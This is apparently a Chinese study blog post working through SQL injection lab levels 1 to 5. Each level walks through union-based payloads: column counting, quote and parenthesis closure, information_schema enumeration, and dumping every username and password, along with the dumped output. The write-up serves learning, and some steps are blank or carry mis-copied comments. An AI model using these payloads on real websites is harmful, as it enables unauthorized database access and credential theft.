天天看点

2020.12.17 SQL注入SQL注入1-5题

SQL注入1-5题

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql数据库的用户名
SELECT DATABASE() -- 当前数据库

SELECT *,schema_name FROM schemata -- 当前用户拥有的所有的数据库的名字,schema_name
SELECT * FROM TABLES -- 当前用户拥有的所有数据库及其库下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 当前用户拥有的所有数据库及其库下面的表的名字,及表下面的字段的名字
           

(1).获取所有账号密码 有引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将后面的imint进行一个注释 
           
  1. 获取账号和密码所在列
?id=' union select 1,2,3  --+     // '  强行闭合放空

           
  1. 获取所在的库库名(爆库)
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
    //Your Login name:emails,referers,uagents,users   找出来的表
           
  1. 获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
           
  1. 获取所有密码和账号
?id=' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
           

(2).获取所有账号密码 无引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   
//--+  将后面的imint进行一个注释    因为id为数字型,没有单引号括着
           
  1. 获取账号和密码所在列
?id='' union select 1,2,3  --+
//数字型放空直接两个单引号
           
  1. 获取所在的库库名(爆库)
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
           
  1. 获取表下面的列,查看是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
           
  1. 获取所有密码和账号
?id='' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
           

(3).获取所有账号密码 存在括号和单引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为id为数字型,所以这里不需要存在闭合
           
  1. 获取账号和密码所在列
?id=') union select 1,2,3  --+
//数字型放空直接两个单引号
?id='') union select 1,2,3  --+ //可以运行但是无结果,因为括号单引号和外闭合
           
  1. 获取所在的库库名(爆库)
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
           
  1. 获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
           
  1. 获取所有密码和账号
?id=') union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
           

(4)获取所有账号密码 双引号与括号

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
           
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
           
  1. 获取所在的库库名(爆库)
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
           
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
           
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
           

(5)获取所有账号密码

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
           
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
           
  1. 获取所在的库库名(爆库)
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
           
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
           
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
           

继续阅读